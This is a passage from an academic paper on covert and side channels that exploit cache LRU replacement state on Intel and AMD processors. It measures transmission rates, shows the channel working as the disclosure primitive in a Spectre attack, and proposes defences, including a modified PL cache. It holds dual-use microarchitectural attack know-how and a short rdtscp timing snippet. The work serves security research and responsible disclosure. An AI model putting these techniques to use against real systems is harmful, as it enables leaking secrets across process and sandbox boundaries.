As long as the sender and the receiver are in the same address space, the LRU channel using Algorithm 1 still exists. For example, it can be used to transfer information in the case of escaping sandbox in JavaScript [18], and it can be built between program threads in the same address space. Figure 7 (top) shows the trace observed by the receiver, when the receiver and the sender are two threads in the same address space (using s in C) running in a hyper-threaded sharing, with cycles, cycles, and . Due to the coarse granularity of the readout value of the time stamp counter in AMD, it is hard to identify the signal from the raw measurements (blue dots). The light blue dot line in Figure 7 shows the moving average of the latency of 97 measurements, where the 97 is the best fit period of sending one bit for this trace555The fact that the period does not equal to indicates that threads do not get scheduled evenly. This might be due to the Amazon EC2 platform, as we observe similar phenomenon on Intel processors on EC2.. When the sender is sending 0 and 1 alternatively, the moving average is a wave-like pattern, meaning the receiver can receive the message from the sender. By measuring the total time taken by the receiver to gather the trace and the period of each bit received, the effective transmission rate is 22Kbps. Due to the coarser-granularity of the AMD time stamp counter and running at lower frequency, the transmission rate of the channel is about one order of magnitude lower than that in Intel processors.

We also tested Algorithm 1 under time-sliced sharing setting using s. Figure 8 shows the different results observed by the receiver when the sender is sending 0 and 1. The thresholds to decide whether a latency represents 0 and 1 are selected such as to maximize the difference between 0 and 1. As shown in Figure 8, when cycles, the receiver will receive about of 1s when the sender is sending 0, and about of 1s when the sender is sending 1. This is enough to differentiate 0 and 1, by examining if of 1s is below or above the threshold. Assuming 100 measurements are needed to differentiate from , the transmission rate is about 0.2 bits per second. When increasing , more interleaving between the sender thread and the receiver thread happens during each measurement taken by the receiver, and the difference between 0 and 1 gets greater indicating less noise. The parameter does not play a significant role here.

Vi-C LRU Channel without Shared Memory

We also tested Algorithm 2 under hyper-threaded sharing on AMD EPYC 7571. Figure 7 (bottom) shows a trace observed by the receiver when the sender is sending 0 and 1 alternatively with , , and . The receiver and the sender are two programs (in different memory space). Similarly, the light blue dot line shows the moving average of the latency of 85 measurements, where the 85 is the best fit, resulting in an effective transmission rate of 25Kbps. When the sender is sending 0 and 1 alternatively, the moving average is a wave-like pattern, meaning the receiver can receive the message from the sender. The measured latency in Figure 7 (top) and (bottom) are quite different. This might due to the processor running at a different frequency for power saving at the time of measurement. We do not observe any signal using Algorithm 2 in time-sliced sharing, similar to the case for Intel.

Vi-D Comparing the Evaluated LRU Channels

Table IV compares the transmission rate of the channels tested with different configurations. Hyper-threading gives a much higher transmission rate than time-sliced sharing, because of more interference between the sender and the receiver. Under hyper-threading, Algorithm 1 and Algorithm 2 have similar transmission rate. However, recall that Algorithm 2 is easily affected by noise due to activities of other programs, but the noise is easy to filter, because the noise activity is usually of a different frequency. The LRU channel on AMD processors is about one order of magnitude slower than on Intel processors, due to the coarser-granularity of readout value of time stamp counter and lower clock frequency.

Intel AMD
Hyper-Threaded Algorithm 1 500Kbps 20Kbps
Algorithm 2 500Kbps 20Kbps
Time-Sliced Algorithm 1 2bps 0.2bps
Algorithm 2
TABLE IV: Transmission rate of the evaluated LRU channels

Vii Comparison to Existing Cache Covert Channels

In most of the existing cache side channels, the receiver measures whether certain cache line exists in the cache directly. For example, in the Flush+Reload attack [1], the sender fetches a cache line into the cache, and the receiver measures directly whether a certain cache line is in the cache. To build a channel, the cache replacement should happen due to the sender’s access. Meanwhile, in our LRU cache channel, the sender’s operations does not need to cause any cache replacements, because the LRU states are updated on both cache hits and misses. Instead, the cache replacement happens when the receiver wants to measure the LRU state during decoding.

F+R (mem) F+R (L1) L1 LRU (Alg.1&2)
Intel Xeon E5-2690 336 35 31
Intel Xeon E3-1245 v5 288 40 35
AMD EPYC 7571 232 56 52
TABLE VI: Cache Miss Rate of the Sender Process
F+R (mem) F+R (L1) L1 LRU Alg.1 L1 LRU Alg.2 sender & gcc sender only
Intel Xeon E5-2690 L1D 0.07% 0.04% 0.03% 0.03% 0.03% 0.01%
L2 62% 6.67% 9.59% 15.6% 31% 8.32%
LLC 88% 0.77% 0.71% 1.07% 61% 1.46%
Intel Xeon E3-1245 v5 L1D 0.06% 0.02% 0.01% 0.01% 0.01% 0.00%
L2 63% 11% 17% 14% 48% 26%
LLC 92% 8.12% 8.15% 7.42% 70% 27%
TABLE V: Latency of Encoding (cycles)

Table VI shows the encoding time of the sender. The encoding times in the table include the time to calculate the victim address. For LRU channels, it is assumed that the victim line is already in cache before the attack. The LRU channels are compared with the Flush+Reload channels. We implemented two Flush+Reload channels, the one denoted by F+R (mem) uses clflush instruction to flush the data all the way down to memory, while the F+R (L1) uses eight accesses to the L1 cache set to evict the data from L1. As is shown in the table, both LRU channels require less encoding time than F+R channels. Because for the LRU channel, the sender can encode the message with cache hits, while the Flush+Reload channels always require the sender to have cache misses in the target cache level.

Table VI shows the cache miss rate of the sender process. The results are measured using Linux Perf tool from hardware performance counters666We do not have access to the hardware performance counter on AMD machines on Amazon AWS, so only result from local Intel machines are shown in Table VII. The results show that the sender of LRU Algorithm 1 and Algorithm 2 have smaller L1 cache miss rate than the Flush+Reload. To provide a baseline of no attack, we also show the results when there is only the sender process running on the physical core (denoted by sender only) and the results with the sender sharing the physical core with a benign workload (denoted by sender & gcc). When there is only the sender process, it has the smallest L1 miss rate777The sender only case still has relative high L2 and LLC miss rate due to less references to the L2 and LLC.. When it is sharing the core with a benign program, the benign program, e.g., the , will cause contention in the cache, similar or even bigger to the contention due to the receiver in the LRU channel. Hence, if a victim wants to detect a potential cache side channel attacks using performance counters [42, 43, 44], the LRU channel is difficult to detect as it may not be distinguished from the contention due to benign programs.

Comparing Algorithm 1 with Flush+Reload attack [1], both need shared memory, but the LRU channel does not require explicit flush, and line 0 might be always in the cache. Comparing Algorithm 2 with Flush+Reload attack, no shared memory is required. Comparing Algorithm 2 with Prime+Probe attack [2], both do not require shared memory. But in Algorithm 2, line N, which is the line accessed by the sender depends on the secret, might be always in the cache. Moreover, the receiver only needs to measure the time of one memory access in LRU channel rather than cache lines in the Prime+Probe attack.

Viii LRU Channels in Transient Execution Attacks

F+R (mem) F+R (L1) L1 LRU Alg.1 L1 LRU Alg.2
Intel Xeon E5-2690 L1D 2.75% 4.73% 4.19% 4.75%
L2 7.58% 0.07% 0.11% 0.09%
LLC 98.15% 0.87% 0.72% 0.87%
Intel Xeon E3-1245 v5 L1D 2.86% 4.84% 4.13% 4.86%
L2 7.39% 0.49% 0.71% 0.45%
LLC 91.17% 1.83% 0.74% 0.96%
TABLE VII: Cache Miss Rate of Spectre V1 Attack
Fig. 9: (top) Cache miss rate of L1 Data cache and (bottom) normalized CPI when different cache replacement policies (Tree-PLRU, FIFO, random) are used in the L1 Data cache. The results are normalized with the result of Tree-PLRU policy.

Transient execution attacks leverage transient execution to access secret and a covert channel to pass the secret to the attacker [18, 19, 20]. Currently, most transient execution attacks proof-of-concept code uses the cache Flush+Reload covert channel, e.g., the example code in [18]. Here we demonstrate that our LRU covert channel also works with Spectre attack to retrieve the secret.

Note that here the secret contains more than 1 bit and multiple cache sets are used to encode the secret. In practice, 63 cache sets are used (both Intel and AMD processors tested have 64 sets, remaining one set is for the 7 elements in the pointer chasing algorithm as discussed in Section IV-D). Practical issues such as minimizing noise due to cache prefetchers are discussed in the Appendix C.

The Flush+Reload covert channel needs one memory access depending on the secret as the sender’s operation. Meanwhile, as shown in both algorithms in Section IV, the sender’s operation in the LRU channels also only need one memory access whose target set depends on the secret. Thus, the victim code using the LRU channel can be identical to the disclosure gadget in the Flush+Reload channel. Thus, when demonstrating transient execution attack using the LRU channels, we take the in Spectre variant 1 attack sample code [18] and keep the victim (sender) code to be the same, and change the attacker (receiver) code to use the L1 LRU channels as the disclosure primitive instead. We are able to launch the Spectre attack using the LRU channels (both Algorithm 1 and 2) to observe the secret. Table VII shows the cache miss rate (including both the victim and the attacker) during a Spectre attack.

Comparing to the Flush+Reload channel, the advantage of the LRU disclosure primitive is the short encoding time (i.e., the sender’s operations), and thus, a smaller speculative window is required, which may make the attack more dangerous and harder to defend.

Ix Defending the LRU Channels

The LRU timing-based channels leverage the fact that the sender and the receiver share the LRU states in caches. Thus, there could be several approaches to defend the LRU timing-based channels.

Ix-a Removing the LRU States

One approach is to use another cache replacement policy instead of LRU or PLRU. In this way, no more LRU state exists, and the channel is removed.

Random Replacement Policy: Random replacement policy does not need any states in the cache. Every time a replacement is needed, a random cache way in the cache set will be evicted.

FIFO Replacement Policy: First-In First-Out (FIFO or Round-Robin) replacement policy selects the oldest cache line that is fetched into the cache to be the victim. States are still required to store the history of cache lines fetched into cache. However, different from LRU, the FIFO states are only updated when a new cache line is brought into the cache on cache misses. And thus, although FIFO state contains extra information than which cache line is presented in the cache, the sender’s behavior might already be able to be observed by the receiver using existing cache channels.

Performance Evaluation of Random and FIFO Policies: LRU replacement policy is widely used in processors because of its performance. In this section, we evaluate the performance of different replacement policies in the GEM5 simulator [45]. We simulated a single out-of-order CPU core and a memory system with 2-level caches (32KiB 4-way L1I, 64KiB 8-way L1D with a latency of 4 cycles, 2MiB 16-way L2 with a latency of 8 cycles, and main memory latency of 50ns). SPEC 2006 int and float benchmarks were tested [46]. Since we focus on the LRU channels in the L1D cache, we tested different replacement policies in L1D cache.

As shown in Figure 9 (top), compared to Tree-PLRU, the FIFO and Random replacement policies give small degradation on L1D cache miss rate overall. Depending on the benchmark, FIFO and Random replacement policy sometimes have an even smaller cache miss rate than Tree-PLRU. Since an L1 miss can still hit in L2, the overall CPU performance, indicated by cycles per instruction (CPI) in Figure 9 (bottom), is only changed less than 2% compared to the baseline. Thus, using a different replacement policy in the L1 cache to mitigate the LRU side and covert channel only gives small overhead – while increasing security. Similarly, if the channels in all the levels of cache are to be mitigated, the replacement policies of all the levels of caches needs to be changed.

Ix-B LRU Attack and Secure Caches

Fig. 10: PL cache replacement logic flow-chart. White boxes show the original PL cache design in [24]. Blue boxes show the new PL logic added in our simulation to defend the LRU attack.
Fig. 11: Simulation result of the LRU attack Algorithm 2 in GEM5 with (top) original PL cache design and (bottom) new PL cache design which locks the LRU state to defend the LRU attack.

Partitioning: Many secure caches partition the cache lines (tag and data) between the victim and the attacker [23, 24, 25, 26, 47], but the replacement policy and state is not considered and specified.

For example, in Partition-Locked (PL) cache [24], each cache line is extended with one lock bit. When a cache line is locked, the line will not be evicted by any cache replacement until unlocking to protect the line, as shown in Figure 10. If a locked line is chosen as victim to be replaced, the replacement will not happen and the incoming line will be handled uncached. But the LRU state will still be updated on accesses to the locked cache line, and the update will affect the LRU states of other lines. We implemented the PL cache using PLRU replacement algorithm in the GEM5 simulator, and tested the LRU attack. During the test, line N (the line accessed by the sender) is first locked by the sender, and Algorithm 2888Algorithm 1 is protected by PL cache when line 0 is locked. Because line 0 will not be evicted in the decoding phase, and the receiver will always get cache hit no matter what the sender is sending. is used to build a channel. As shown in Figure 11 (top), with the original design, the receiver can still receive the secret by observe the timing of accessing line 0. To mitigate the LRU channel, the LRU state should be locked as well. We add the blue boxes in Figure 10 to PL cache design. With the new design, receiver will always observe a cache hit, as shown in Figure 11 (bottom).

In DAWG [28], it is proposed to partition the cache ways and the Tree-PLRU states in a cache set between protection domains. We are unaware of any other designs that partition the LRU states.

For transient execution cache side-channel attacks, one solution proposed in Invisispec [32] is to only update micro-architectural states (including the LRU state) after the access is not speculative.

There are also software partitioning schemes. For example, using “page coloring” to map different processes to different cache sets to partition the cache [47]. However, the L1 cache is small and partitioning of the L1 cache cannot be achieved by partitioning the addresses at the granularity of a page.

Randomization: Other secure cache designs mitigate cache channels by adding randomness in the logic. For example, Random fill cache [29] decouple the access and the cache line brought into cache, by fetching a random cache line into cache instead of the cache line being accessed. However, if the cache line is already in the cache, on a cache hit, the replacement state will be updated, and the LRU channel could still work.

Some secure cache designs randomize the mapping between the addresses and the cache sets, such as New cache, RP cache, CEASER cache [24, 30, 48]. So the receiver (and the sender) cannot map the addresses to the target cache set to build a channel.

X Related Work

Most cache timing channels leverage the tag array. The Flush+Reload attack [1] transfers information by reusing the same data in the cache. There are other reuse-based cache side-channel attacks, such as Cache Collision attack [3]. The Prime+Probe attack [2], on the other hand, transfers information by creating contention in the cache. Another example of the contention-based side channel is Evict+Time attack [2].

Shared cache components other than the tag array have also be leveraged for side and covert channels. For example, the contention in the cache directory in non-inclusive caches has been demonstrated and used for a side-channel attack [5]. Cache coherence states have also been used to create covert channels [6, 49].

In parallel to this work, there is a recent arXiv preprint paper [39] on side channels that leverage the replacement policy in LLC, where shared memory is required. However, we demonstrate the LRU channels both with and without shared memory. Their attack also relies on clflush instruction and their use of flush operation cannot be replaced by a series of memory accesses (as we do in our attack), which makes the attack unpractical in settings where clflush is not available, e.g., in JavaScript. Further, L1 is directly accessed by the processor pipeline and local cache accesses will not cause updates in the LLC replacement states used in [39], so our attack is more stealthy and any LLC defenses do not stop the L1 LRU channel.

Due to the threat of the various timing channels, many secure cache designs have been proposed in the literature to defend the attacks [23, 24, 25, 26, 27, 28, 47], as already discussed in Section IX-B. However, most do not have, or did not consider, LRU attacks and cannot defend against them.

Another approach is to use hardware performance counters to detect a potential cache side channel attacks in real time, [42, 43, 44], because the root cause of the existing cache side channel is cache misses. However, the LRU channels require either hits or misses, so counting misses of the sender only will not detect the attack.

Xi Conclusion

In this paper, we presented novel timing-based channels leveraging the cache LRU replacement states. We designed two protocols to transfer information between processes using the LRU states for both cases when there is shared memory between the sender and the receiver and when there is no shared memory. We also demonstrated the LRU channels on real-world commercial processors. The LRU channels require access (cache hit or miss) from the sender, while all the existing known timing-based cache side and covert channels always need the sender to trigger a cache replacement (a cache miss). Thus, the LRU channel has shorter encoding time, lower cache miss rate for the sender, and requires a smaller speculation window in transient attack scenarios. We show the new LRU channel also affect the current secure cache designs. In the end, we proposed several methods to mitigate the LRU channel and evaluated them, including modified design of a secure PL cache.

Responsible Disclosure: We have informed Intel and AMD of our findings on March 6th, 2019, and they have acknowledged the receipt of the information.

Acknowledgment

We would like to thank the authors of Invisispec [32], especially Mengjia Yan, for the their open-source code and scripts. Special thanks to Linbo Shao for helping with PL cache implementation in GEM5. Thanks to Amazon for their cloud research credits that we used to run some of our experiments and benchmarks on their EC2 platform. This work was supported by NSF grants 1651945 and 1813797, and through SRC award number 2844.001.

References

  • [1] Y. Yarom and K. Falkner, “Flush+ reload: A high resolution, low noise, l3 cache side-channel attack.” in USENIX Security Symposium, vol. 1, 2014.
  • [2] D. A. Osvik, A. Shamir, and E. Tromer, “Cache attacks and countermeasures: the case of AES,” in Cryptographers’ Track at the RSA Conference.   Springer, 2006.
  • [3] J. Bonneau and I. Mironov, “Cache-collision timing attacks against AES,” in International Workshop on Cryptographic Hardware and Embedded Systems.   Springer, 2006.
  • [4] F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee, “Last-level cache side-channel attacks are practical,” in Security and Privacy (SP), 2015 IEEE Symposium on.   IEEE, 2015.
  • [5] M. Yan, R. Sprabery, B. Gopireddy, C. Fletcher, R. Campbell, and J. Torrellas, “Attack directories, not caches: Side channel attacks in a non-inclusive world,” in Attack Directories, Not Caches: Side Channel Attacks in a Non-Inclusive World.   IEEE, 2019.
  • [6] F. Yao, M. Doroslovacki, and G. Venkataramani, “Are Coherence Protocol States Vulnerable to Information Leakage?” in High Performance Computer Architecture (HPCA), 2018 IEEE International Symposium on.   IEEE, 2018.
  • [7] Z. Wang and R. B. Lee, “Covert and side channels due to processor architecture,” in Computer Security Applications Conference, 2006. ACSAC’06. 22nd Annual.   IEEE, 2006.
  • [8] M. Schwarz, M. Schwarzl, M. Lipp, and D. Gruss, “Netspectre: Read arbitrary memory over network,” arXiv preprint arXiv:1807.10535, 2018.
  • [9] A. Moghimi, T. Eisenbarth, and B. Sunar, “Memjam: A false dependency attack against constant-time crypto implementations in sgx,” in Cryptographers’ Track at the RSA Conference.   Springer, 2018.
  • [10] A. C. Aldaya, B. B. Brumley, S. ul Hassan, C. P. García, and N. Tuveri, “Port contention for fun and profit,” in Port Contention for Fun and Profit.
  • [11] A. Bhattacharyya, A. Sandulescu, M. Neugschwandtner, A. Sorniotti, B. Falsafi, M. Payer, and A. Kurmus, “Smotherspectre: exploiting speculative execution through port contention,” arXiv preprint arXiv:1903.01843, 2019.
  • [12] D. Evtyushkin, R. Riley, N. C. Abu-Ghazaleh, D. Ponomarev et al., “Branchscope: A new side-channel attack on directional branch predictor,” in ACM SIGPLAN Notices, vol. 53, no. 2.   ACM, 2018.
  • [13] D. Evtyushkin, D. Ponomarev, and N. Abu-Ghazaleh, “Jump over aslr: Attacking branch predictors to bypass aslr,” in The 49th Annual IEEE/ACM International Symposium on Microarchitecture.   IEEE Press, 2016.
  • [14] D. Gullasch, E. Bangerter, and S. Krenn, “Cache games–Bringing access-based cache attacks on AES to practice,” in Security and Privacy (SP), 2011 IEEE Symposium on.   IEEE, 2011.
  • [15] C. Percival, “Cache missing for fun and profit,” 2005.
  • [16] D. J. Bernstein, “Cache-timing attacks on AES,” 2005.
  • [17] O. Acıiçmez and Ç. K. Koç, “Trace-driven cache attacks on AES (short paper),” in International Conference on Information and Communications Security.   Springer, 2006.
  • [18] P. Kocher, J. Horn, A. Fogh, , D. Genkin, D. Gruss, W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher, M. Schwarz, and Y. Yarom, “Spectre attacks: Exploiting speculative execution,” in 40th IEEE Symposium on Security and Privacy (S&P’19), 2019.
  • [19] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, and M. Hamburg, “Meltdown: Reading kernel memory from user space,” in 27th USENIX Security Symposium (USENIX Security 18), 2018.
  • [20] C. Canella, J. Van Bulck, M. Schwarz, M. Lipp, B. von Berg, P. Ortner, F. Piessens, D. Evtyushkin, and D. Gruss, “A Systematic Evaluation of Transient Execution Attacks and Defenses,” arXiv preprint arXiv:1811.05441, 2018.
  • [21] K. So and R. N. Rechtschaffen, “Cache operations by mru change,” IEEE Transactions on Computers, vol. 37, 1988.
  • [22] A. Malamy, R. N. Patel, and N. M. Hayes, “Methods and apparatus for implementing a pseudo-lru cache memory replacement scheme with a locking feature,” Oct. 4 1994, uS Patent 5,353,425.
  • [23] R. B. Lee, P. Kwan, J. P. McGregor, J. Dwoskin, and Z. Wang, “Architecture for protecting critical secrets in microprocessors,” in ACM SIGARCH Computer Architecture News, vol. 33, no. 2.   IEEE Computer Society, 2005.
  • [24] Z. Wang and R. B. Lee, “New cache designs for thwarting software cache-based side channel attacks,” in ACM SIGARCH Computer Architecture News, vol. 35, no. 2.   ACM, 2007.
  • [25] L. Domnitser, A. Jaleel, J. Loew, N. Abu-Ghazaleh, and D. Ponomarev, “Non-monopolizable caches: Low-complexity mitigation of cache side channel attacks,” ACM Transactions on Architecture and Code Optimization (TACO), vol. 8, 2012.
  • [26] D. Zhang, A. Askarov, and A. C. Myers, “Language-based control and mitigation of timing channels,” ACM SIGPLAN Notices, vol. 47, 2012.
  • [27] M. Yan, B. Gopireddy, T. Shull, and J. Torrellas, “Secure Hierarchy-Aware Cache Replacement Policy (SHARP): Defending Against Cache-Based Side Channel Attacks,” in Proceedings of the 44th Annual International Symposium on Computer Architecture.   ACM, 2017.
  • [28] V. Kiriansky, I. Lebedev, S. Amarasinghe, S. Devadas, and J. Emer, “DAWG: A defense against cache timing attacks in speculative execution processors,” in 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO).   IEEE, 2018.
  • [29] F. Liu and R. B. Lee, “Random fill cache architecture,” in Microarchitecture (MICRO), 2014 47th Annual IEEE/ACM International Symposium on.   IEEE, 2014.
  • [30] F. Liu, H. Wu, K. Mai, and R. B. Lee, “Newcache: Secure cache architecture thwarting cache side-channel attacks,” IEEE Micro, vol. 36, 2016.
  • [31] G. Keramidas, A. Antonopoulos, D. N. Serpanos, and S. Kaxiras, “Non deterministic caches: A simple and effective defense against side channel attacks,” Design Automation for Embedded Systems, vol. 12, 2008.
  • [32] M. Yan, J. Choi, D. Skarlatos, A. Morrison, C. Fletcher, and J. Torrellas, “InvisiSpec: Making Speculative Execution Invisible in the Cache Hierarchy,” in 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO).   IEEE, 2018.
  • [33] K. N. Khasawneh, E. M. Koruyeh, C. Song, D. Evtyushkin, D. Ponomarev, and N. Abu-Ghazaleh, “Safespec: Banishing the spectre of a meltdown with leakage-free speculation,” arXiv preprint arXiv:1806.05179, 2018.
  • [34] A. Jaleel, K. B. Theobald, S. C. Steely Jr, and J. Emer, “High performance cache replacement using re-reference interval prediction (rrip),” in ACM SIGARCH Computer Architecture News, vol. 38, no. 3.   ACM, 2010.
  • [35] T. Ristenpart, E. Tromer, H. Shacham, and S. Savage, “Hey, you, get off of my cloud: exploring information leakage in third-party compute clouds,” in Proceedings of the 16th ACM conference on Computer and communications security.   ACM, 2009.
  • [36] Y. Zhang, A. Juels, M. K. Reiter, and T. Ristenpart, “Cross-tenant side-channel attacks in PaaS clouds,” in Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security.   ACM, 2014.
  • [37] E. M. Koruyeh, K. N. Khasawneh, C. Song, and N. Abu-Ghazaleh, “Spectre returns! speculation attacks using the return stack buffer,” in 12th USENIX Workshop on Offensive Technologies (WOOT 18), 2018.
  • [38] G. Maisuradze and C. Rossow, “ret2spec: Speculative execution using return stack buffers,” in Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security.   ACM, 2018.
  • [39] S. Briongos, P. Malagón, J. M. Moya, and T. Eisenbarth, “Reload+ refresh: Abusing cache replacement policies to perform stealthy cache attacks,” arXiv preprint arXiv:1904.06278, 2019.
  • [40] G. Navarro, “A guided tour to approximate string matching,” ACM computing surveys (CSUR), vol. 33, 2001.
  • [41] Software Optimization Guide for AMD Family 17h Processors, https://developer.amd.com/wordpress/media/2013/12/55723_SOG_Fam_17h_Processors_3.00.pdf accessed Feb. 2019.
  • [42] T. Zhang, Y. Zhang, and R. B. Lee, “Cloudradar: A real-time side-channel attack detection system in clouds,” in International Symposium on Research in Attacks, Intrusions, and Defenses.   Springer, 2016.
  • [43] M. Chiappetta, E. Savas, and C. Yilmaz, “Real time detection of cache-based side-channel attacks using hardware performance counters,” Applied Soft Computing, vol. 49, 2016.
  • [44]

    M. Alam, S. Bhattacharya, D. Mukhopadhyay, and S. Bhattacharya, “Performance counters to rescue: A machine learning based safeguard against micro-architectural side-channel-attacks.”

    IACR Cryptology ePrint Archive, vol. 2017, 2017.
  • [45] N. Binkert, B. Beckmann, G. Black, S. K. Reinhardt, A. Saidi, A. Basu, J. Hestness, D. R. Hower, T. Krishna, S. Sardashti et al., “The GEM5 simulator,” ACM SIGARCH Computer Architecture News, vol. 39, 2011.
  • [46] J. L. Henning, “Spec cpu2006 benchmark descriptions,” ACM SIGARCH Computer Architecture News, vol. 34, 2006.
  • [47] V. Costan, I. Lebedev, and S. Devadas, “Sanctum: Minimal hardware extensions for strong software isolation,” in 25th USENIX Security Symposium (USENIX Security 16), 2016.
  • [48] M. K. Qureshi, “Ceaser: Mitigating conflict-based cache attacks via encrypted-address and remapping,” in 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO).   IEEE, 2018.
  • [49] C. Trippel, D. Lustig, and M. Martonosi, “MeltdownPrime and SpectrePrime: Automatically-Synthesized Attacks Exploiting Invalidation-Based Coherence Protocols,” arXiv preprint arXiv:1802.03802, 2018.

Appendix A Measuring time with rdtscp

Figure 12 shows the code to measure the time of a single memory access using rdtscp instruction. Figure 13 shows the measurement results using the code in Figure 12 when the data is in difference cache levels. As shown in Figure 13, the measurement results of L1 hit and L1 miss (L2 hit) completely overlap and have the same distribution. Thus, simply measuring a single memory access cannot distinguish the time different between L1 hit and L1 miss. Replacing the rdtscp instruction with the lfence and rdtsc instructions has the same result. Hence, we use pointer chasing approach discussed in the paper.

rdtscp
movl %eax, %esi
movq (%rbx), %rax     <- memory access being measured
rdtscp
subl %esi, %eax
Fig. 12: Code to measure the latency of a single access.
Fig. 13: Histogram of access latencies of single L1 hit and L1 miss (L2 hit) measured by (left) on Intel Xeon E5-2690 and (right) on AMD EPYC 7571.

Appendix B Results on Intel Xeon E3-1245 v5

Figure 14 shows the traces observed by the receiver in hyper-threaded sharing on Intel Xeon E3-1245 v5 using Algorithm 1 (top) and Algorithm 2 (bottom). The experimental setting is the same as in Figure 5. Figure 15 shows the percentage of 1’s observed by the receiver using Algorithm 1 in time-sliced sharing with the same setting as in Figure 6. The results are similar to that on Intel Xeon E5-2690 and show the attack can be applied to multiple platforms.

Fig. 14: Example sequences of receiver’s observation when the sender is sending 0 and 1 alternatively using (top) Algorithm 1 with , , and and (bottom) Algorithm 2 with , and on Intel Xeon E3-1245 v5 with a transmission rate of 580Kbps.
Fig. 15: Percentage of 1’s observed by the receiver on Intel Xeon E3-1245 v5, when the sender is sending (left) 0 and (right) 1 using Algorithm 1 under time-sliced sharing.

Appendix C Dealing with Noise from Cache Prefetchers

During the Spectre attacks, a series of memory access will be triggered, and the cache prefetchers would also be activated and can prefetch cache lines into L1 cache, which changes the LRU states. This introduces much added noise. To deal with the noise from the prefetchers, our strategy is to launch the attack in multiple rounds. For each round, the cache sets are accessed in a different random order (using a random number generator, with a different seed for each round). When processing the result, the average of all the rounds is taken. Because each round uses a different random seed, the prefetcher will prefetch different cache lines in each round, and the noise should be cancelled out.